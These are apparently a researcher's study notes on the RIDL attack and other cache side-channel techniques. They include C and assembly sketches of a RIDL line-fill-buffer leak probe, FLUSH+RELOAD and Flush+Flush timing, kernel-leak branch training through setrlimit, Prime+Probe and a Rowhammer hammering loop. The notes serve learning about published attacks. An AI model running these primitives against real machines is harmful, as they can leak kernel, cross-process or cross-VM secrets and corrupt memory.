RIDL notes

Background

For a speculative attack, three conditions are needed:

  • a cache for holding the dependent load
  • a timer with sufficient resolution
  • some branches that the hardware can speculate over

Cost of removing these building blocks:

  • disabling out-of-order execution makes the problem go away, but we pay a 5-20x slowdown tax
  • removing caches: 50-100x slowdown

RIDL attack

  • the victim makes a load or store
  • the data is placed in a Line Fill Buffer (LFB)
  • the attacker makes a speculative load from a newly mapped page, which can pick up stale LFB data
  • the attacker makes a dependent load indexed by the leaked value
  • time the FLUSH+RELOAD buffer to recover the value (see the sketch below)
  • each probe address must be part of a page-aligned cache line
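A minimal sketch of the probe side, in C with intrinsics. All names (probe_buf, time_access, the 80-cycle threshold taken from the FLUSH+RELOAD notes further down) are illustrative, and the fault/assist suppression here uses TSX, which is only one of the options; this is not the paper's code.

    // Sketch only: assumes x86 with RTM, built with gcc -O1 -mrtm; names are made up.
    #include <immintrin.h>      // _xbegin/_xend, _mm_clflush, _mm_mfence
    #include <x86intrin.h>      // __rdtscp
    #include <stdint.h>
    #include <stdio.h>
    #include <sys/mman.h>

    #define PAGE 4096

    static uint8_t probe_buf[256 * PAGE];   // FLUSH+RELOAD buffer, one page per byte value

    static uint64_t time_access(volatile uint8_t *p) {
        unsigned aux;
        uint64_t t0 = __rdtscp(&aux);
        (void)*p;                           // reload
        uint64_t t1 = __rdtscp(&aux);
        return t1 - t0;
    }

    int main(void) {
        // Newly mapped, never-touched page: the load below misses everywhere,
        // and the core may speculatively forward stale line-fill-buffer data.
        volatile uint8_t *new_page =
            mmap(NULL, PAGE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if ((void *)new_page == MAP_FAILED)
            return 1;

        for (int i = 0; i < 256; i++)       // flush the probe buffer
            _mm_clflush(&probe_buf[i * PAGE]);
        _mm_mfence();

        if (_xbegin() == _XBEGIN_STARTED) { // TSX suppresses the fault/abort
            uint8_t v = *new_page;                           // speculative load
            (void)*(volatile uint8_t *)&probe_buf[v * PAGE]; // dependent load encodes v
            _xend();
        }

        for (int i = 0; i < 256; i++)       // time the FLUSH+RELOAD buffer
            if (time_access(&probe_buf[i * PAGE]) < 80)
                printf("candidate leaked byte: 0x%02x\n", i);
        return 0;
    }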

Line Fill Buffers

  • non-blocking cache
  • load squashing
  • write combining
  • non-temporal requests

How to determine that the LFB leaks?

LFB hit experiment

  • Kernel module
  • Mark empty pages in victim thread as write-back (WB), write-through (WT), write-combine (WC) and uncacheable (UC)
  • Use TSX
  • Store a value to a fixed memory address
  • Compare attack hits to the lfb_hit perf counter (see the counter sketch below)
  • cross-thread: gives many hits
  • with no victim running, reads return just zeroes
  • same hw thread: mostly hits
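A hedged sketch of the counter-reading side using the standard perf_event_open interface. RAW_EVENT_LFB_HIT is a placeholder, not a real event code: the actual event/umask for an lfb_hit-style counter is model-specific and has to be looked up for the target CPU.

    #include <linux/perf_event.h>
    #include <sys/ioctl.h>
    #include <sys/syscall.h>
    #include <sys/types.h>
    #include <unistd.h>
    #include <string.h>
    #include <stdint.h>
    #include <stdio.h>

    #define RAW_EVENT_LFB_HIT 0x0000   /* placeholder, look up the model-specific code */

    static long perf_event_open(struct perf_event_attr *attr, pid_t pid, int cpu,
                                int group_fd, unsigned long flags) {
        return syscall(SYS_perf_event_open, attr, pid, cpu, group_fd, flags);
    }

    int main(void) {
        struct perf_event_attr attr;
        memset(&attr, 0, sizeof attr);
        attr.size = sizeof attr;
        attr.type = PERF_TYPE_RAW;         // raw, model-specific event
        attr.config = RAW_EVENT_LFB_HIT;   // placeholder
        attr.disabled = 1;
        attr.exclude_kernel = 1;

        int fd = perf_event_open(&attr, 0, -1, -1, 0);   // this process, any CPU
        if (fd < 0) { perror("perf_event_open"); return 1; }

        ioctl(fd, PERF_EVENT_IOC_RESET, 0);
        ioctl(fd, PERF_EVENT_IOC_ENABLE, 0);
        /* ... run the attack loop here and record FLUSH+RELOAD hits ... */
        ioctl(fd, PERF_EVENT_IOC_DISABLE, 0);

        uint64_t count = 0;
        read(fd, &count, sizeof count);
        printf("counter value: %llu\n", (unsigned long long)count);
        return 0;
    }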

Read experiment

  • Initially write a known value, then in a loop read it back, followed by mfence (see the victim sketch below)
  • Record hits in the attacker
  • WB and WT don't give any hits => the cache is not the leak
  • leaking on a load => store-to-load forwarding is not the leak
  • if flushed, we can always read the secret => the cache is not the leak
  • WC and UC have a high hit rate => points to the LFB
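A minimal sketch of the victim side of this experiment; the value, variable name and the page-attribute setup done by the kernel module are all assumptions.

    #include <emmintrin.h>   // _mm_mfence
    #include <stdint.h>

    #define KNOWN_VALUE 0x42 // illustrative

    // Lives on a page the kernel module marks as WB/WT/WC/UC for each run.
    static volatile uint8_t slot;

    void victim_read_loop(void) {
        slot = KNOWN_VALUE;      // initially write a known value
        for (;;) {
            (void)slot;          // read it back ...
            _mm_mfence();        // ... followed by mfence
        }
    }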

Write experiment

  • In a loop, write four values to four sequential cache lines, followed by mfence (see the victim sketch below)
  • Record the frequency of retrieval
  • Turn off Speculative Store Bypass Disable for victim and attacker
  • WB gives hits for the last value => suggests it does write combining
  • if flushed, all values give hits => points to the LFB
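The matching victim sketch for the write experiment; the four values and the 64-byte line size are illustrative.

    #include <emmintrin.h>   // _mm_mfence
    #include <stdint.h>

    static volatile uint8_t lines[4 * 64];   // four sequential 64-byte cache lines

    void victim_write_loop(void) {
        for (;;) {
            for (int i = 0; i < 4; i++)
                lines[i * 64] = (uint8_t)(0xA0 + i);  // four distinct values, one per line
            _mm_mfence();                             // serialize before the next round
        }
    }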

Synchronization

  • Use serialization via mfence; use contention and eviction for synchronization

Exploitation with RIDL

  • non-SMT, single core: data recently read/written by the victim before a mode switch (iret, vmenter, ...)
  • SMT attack: data concurrently read/written by another hw thread sharing the same core
  • difference to Meltdown/L1TF: the target address can be valid, no need for an invalid-page fault
  • get data in flight: syscalls, invoking a setuid binary, ...
  • targeting: sync with the victim and align the leaked data (repeat multiple times and filter out noise)

Cross-Process attack

  • example: call passwd to leak /etc/passwd
  • use filtering: mask-sub-rotate(?)
  • use heuristics: must be ASCII (see the sketch below)
  • align to known "root" field
  • recover 26 bytes in 24 hours
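A sketch of the kind of post-processing this implies: keep only printable-ASCII candidates and majority-vote across many noisy runs. All names and sizes are made up, and the mask-sub-rotate gadget itself is not shown.

    #include <ctype.h>
    #include <stddef.h>
    #include <stdint.h>

    #define MAX_OFFSET 64

    static unsigned votes[MAX_OFFSET][256];

    // Called for every (offset, byte) candidate the leak produces.
    void record_candidate(size_t offset, uint8_t byte) {
        if (offset < MAX_OFFSET && isprint(byte))   // heuristic: must be ASCII
            votes[offset][byte]++;
    }

    // After many runs, pick the most frequently seen byte per offset.
    uint8_t best_guess(size_t offset) {
        unsigned best = 0;
        uint8_t guess = '?';
        for (int b = 0; b < 256; b++)
            if (votes[offset][b] > best) { best = votes[offset][b]; guess = (uint8_t)b; }
        return guess;
    }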

Cross-VM attack

  • two co-located VMs running on SMT siblings of the same core
  • recover 16 bytes in 24 hours

Kernel attacks

  • read 0 bytes from /proc/self/maps
  • an attacker running on the sibling hw thread could leak the first 64 bytes of the victim process's memory mappings
  • another variant does not require SMT: execute a syscall and run our attack immediately after

Leaking arbitrary kernel memory

  • if SMAP is disabled, we can cause speculative execution in copy_from_user
  • call setrlimit multiple times to reach copy_from_user and train the branch predictor (see the sketch below)
  • the speculative execution leaks memory into the LFB
  • the user-mode program can then recover the data from the LFB
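A sketch of the training step only: hammering copy_from_user() via setrlimit() with a legitimate argument. The iteration count and function name are arbitrary; the later call with an attacker-chosen pointer and the LFB recovery are not shown.

    #include <sys/resource.h>

    void train_copy_from_user(void) {
        struct rlimit rl;
        getrlimit(RLIMIT_NOFILE, &rl);       // a valid value to hand back in
        for (int i = 0; i < 1000; i++)       // arbitrary training count
            setrlimit(RLIMIT_NOFILE, &rl);   // each call goes through copy_from_user()
    }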

Javascript attacks

  • process-per-origin does not stop RIDL
  • WebAssembly uses demand paging, which we can use for the speculative load
  • clflush is not available, so FLUSH+RELOAD is out
  • EVICT+RELOAD works but is far more noisy since it makes extensive use of L1D
  • built-in high-resolution timers are disabled
  • they used modified browsers for their exploit, but mention that timers can be created from SharedArrayBuffer or GPU-based counters

How to read a paper

https://www.huffpost.com/entry/how-to-read-and-understand-a-scientific-paper_b_5501628

 1. Read the intro, not the abstract (to avoid bias)
 2. Identify the big question
 3. Summarize the background in five sentences or less
 4. Identify the specific questions
 5. Identify the approach
 6. Read the methods section; draw a diagram for each experiment
 7. Read the results section: one paragraph per experiment, each figure, each table/graph. Error bars? Sample size?
 8. Do the results answer the specific question(s)?
 9. Conclusion/discussion: what do the authors think? Do you agree? Next step?
10. Read the abstract. Does it match what the authors said in the paper? Does it fit your interpretation of the paper?
11. Find out what other researchers say about the paper

Need to be able to detect if a cache line was recently accessed. If clflush only flushed L1 that would be hard, but since it flushes all the way to memory we can compare 1-3 cycles against 80-100 cycles.

Need to be able to uniquely identify cache lines. Each cache line address has the form YYYxxxBB: xxx = set, YYY = tag, BB = address inside the block (see the sketch below).

What address can be leaked?

  • same address space, or via gadgets - Spectre
  • same address space or privileged - Meltdown
  • any physical address - Foreshadow

Buffers - why are all these needed?

  • load buffer
  • store buffer
  • line fill buffer
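A small sketch of that address split, assuming a 64-byte line and 64 sets; both numbers are illustrative and cache dependent.

    #include <stdint.h>
    #include <stdio.h>

    #define LINE_BITS 6   // BB: 64-byte block => 6 offset bits
    #define SET_BITS  6   // xxx: 64 sets => 6 set-index bits

    int main(void) {
        uintptr_t addr   = 0x7ffdeadbeef0;                                         // example address
        uintptr_t offset = addr & (((uintptr_t)1 << LINE_BITS) - 1);               // BB: byte inside the block
        uintptr_t set    = (addr >> LINE_BITS) & (((uintptr_t)1 << SET_BITS) - 1); // xxx: set index
        uintptr_t tag    = addr >> (LINE_BITS + SET_BITS);                         // YYY: tag
        printf("tag=%#lx set=%#lx offset=%#lx\n",
               (unsigned long)tag, (unsigned long)set, (unsigned long)offset);
        return 0;
    }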

Terminology

  • Covert channel is a term invented by Butler Lampson
  • Side-channel attacks can exploit many things, such as caches, power, and memory

Flush+Reload

Works on a single cache line
4-5 probes before it starts being unreliable
Two-phase attack
1. flush a cache line using clflush
2. measure the time to reload the data
Gullasch et al. created the original attack.
    gives info on accesses to shared memory pages
Yuval Yarom, Katrina Falkner, July 18, 2013. FLUSH+RELOAD: a High Resolution, Low Noise, L3 Cache Side-Channel Attack
    Improvement: cross-core, since L3 is shared.
    Spy and victim can execute in parallel on different cores
Assembly
    mfence                  # drain pending memory operations before timing
    rdtscp                  # timestamp counter, low 32 bits in %eax
    mov %eax, %esi          # save the start time
    mov (%ebx), %eax        # reload the probed cache line
    rdtscp                  # read the timestamp counter again
    sub %esi, %eax          # %eax = elapsed cycles for the reload
    clflush 0(%ebx)         # flush the line again for the next round

AFAICT, FLUSH+RELOAD is a general technique

1. Flush cache lines using the clflush instruction (the cache line is flushed from all caches, L1, L2, LLC)
2. wait for side effect or trigger side effect
3. measure the access time of the cache line with the cycle counter (rdtscp). Less than ~80-100 cycles means the line has been accessed; a miss takes the access time of memory, which is slower.

In the old Yarom paper, FLUSH+RELOAD: a High Resolution, Low Noise, L3 Cache Side-Channel Attack, step 2 was a delay loop that waited for the target to access a shared page. Yarom could only detect whether a cache line was hit or not; he could not directly read the cache line content.

For Spectre, step 2 consists of the first three steps of the summary above (execute a slow op; some load happens; a FLUSH+RELOAD buffer is accessed). But here the actual cache line content of the target can be retrieved (though only one byte per iteration)?

The Yarom paper talks about the L3 cache. It is a requirement for their exploit since they want to run the target concurrently (and on many processors only the L3 cache is shared between cores). But the same principle is applicable to data in L1.
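The same probe expressed with C intrinsics; a sketch, with the 80-cycle threshold taken from the steps above and machine dependent.

    #include <immintrin.h>   // _mm_clflush, _mm_mfence
    #include <x86intrin.h>   // __rdtscp
    #include <stdint.h>

    #define HIT_THRESHOLD 80 // cycles, machine dependent

    // Returns 1 if *p was cached, i.e. someone touched the line since the last flush.
    int probe(volatile uint8_t *p) {
        unsigned aux;
        _mm_mfence();
        uint64_t t0 = __rdtscp(&aux);    // step 3: time the reload
        (void)*p;
        uint64_t t1 = __rdtscp(&aux);
        _mm_clflush((const void *)p);    // step 1 for the next round
        return (t1 - t0) < HIT_THRESHOLD;
    }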

Evict+Reload

  • Use cache contention instead of clflush
  • For when you don't have access to clflush, like in Javascript
  • Evict the target line by loading something else into the same cache set (see the sketch below)
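A sketch of the eviction step, assuming an eviction set (addresses mapping to the same cache set) has already been found; constructing it is the hard part and is not shown.

    #include <stddef.h>
    #include <stdint.h>

    void evict(volatile uint8_t **eviction_set, size_t n_ways) {
        for (int round = 0; round < 2; round++)     // a couple of passes helps with LRU-like policies
            for (size_t i = 0; i < n_ways; i++)
                (void)*eviction_set[i];             // load something else into the same set
    }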

Flush+Flush

  • Measures variations in clflush timing between cached and non-cached data (see the sketch below)
  • Daniel Gruss, Clémentine Maurice, Klaus Wagner, Stefan Mangard (2016). Flush+Flush: A Fast and Stealthy Cache Attack
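A minimal sketch of the measurement: time clflush itself rather than a reload; it takes noticeably longer when the line is cached, and the threshold is machine dependent.

    #include <immintrin.h>   // _mm_clflush, _mm_mfence
    #include <x86intrin.h>   // __rdtscp
    #include <stdint.h>

    uint64_t time_clflush(const void *p) {
        unsigned aux;
        _mm_mfence();
        uint64_t t0 = __rdtscp(&aux);
        _mm_clflush(p);                  // slower if the line was cached (needs write-back/invalidate)
        uint64_t t1 = __rdtscp(&aux);
        return t1 - t0;
    }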

Invalidate+Transfer

  • Uses Flush+Reload on Intel or Evict+Reload on ARM to implement a cross-package attack

Prime+Probe

  • The attacker occupies a cache set and measures when the victim replaces one of its lines (a timing attack; see the sketch below)
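A sketch of one prime/probe round over a single cache set, assuming the set's addresses are already known; the threshold and names are illustrative.

    #include <stdint.h>
    #include <x86intrin.h>   // __rdtscp

    #define SLOW 80          // cycle threshold, machine dependent

    // Prime: fill the set with our own lines.
    void prime_set(volatile uint8_t **set_lines, int ways) {
        for (int i = 0; i < ways; i++)
            (void)*set_lines[i];
    }

    // Probe: count how many of our lines got displaced (i.e. reload slowly).
    int probe_set(volatile uint8_t **set_lines, int ways) {
        int evictions = 0;
        for (int i = 0; i < ways; i++) {
            unsigned aux;
            uint64_t t0 = __rdtscp(&aux);
            (void)*set_lines[i];
            uint64_t t1 = __rdtscp(&aux);
            if (t1 - t0 > SLOW)
                evictions++;             // the victim touched this set
        }
        return evictions;
    }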

Rowhammer

  • DRAM vulnerability
  • random bit flips by repeatedly accessing a DRAM row
  • some similarities to cache attacks
  • the accesses must bypass all levels of caches to reach DRAM and trigger bit flips (see the sketch below)
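A sketch of the classic hammering loop; choosing two addresses that hit different rows of the same bank is the hard part and is not shown.

    #include <emmintrin.h>   // _mm_clflush
    #include <stdint.h>

    void hammer(volatile uint8_t *row_a, volatile uint8_t *row_b, long reps) {
        for (long i = 0; i < reps; i++) {
            (void)*row_a;                       // activate row A
            (void)*row_b;                       // activate row B
            _mm_clflush((const void *)row_a);   // bypass the caches so the next
            _mm_clflush((const void *)row_b);   // access goes all the way to DRAM
        }
    }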

Links

https://cryptologie.net/article/367/ches-2016-tutorial-part-2-micro-architectural-side-channel-attacks/ Side Channel Attacks on Everyday Applications

https://meltdownattack.com/ https://foreshadowattack.eu/ https://mdsattacks.com/

Gullasch, David, Endre Bangerter, and Stephan Krenn. "Cache Games -- Bringing Access-Based Cache Attacks on AES to Practice." 2011 IEEE Symposium on Security and Privacy. IEEE, 2011.

Yarom, Yuval, and Katrina Falkner. "FLUSH+RELOAD: A High Resolution, Low Noise, L3 Cache Side-Channel Attack." 23rd USENIX Security Symposium (USENIX Security 14). 2014.

Percival, Colin. "Cache Missing for Fun and Profit." 2005.

Bernstein, Daniel J. "Cache-timing Attacks on AES." 2005.
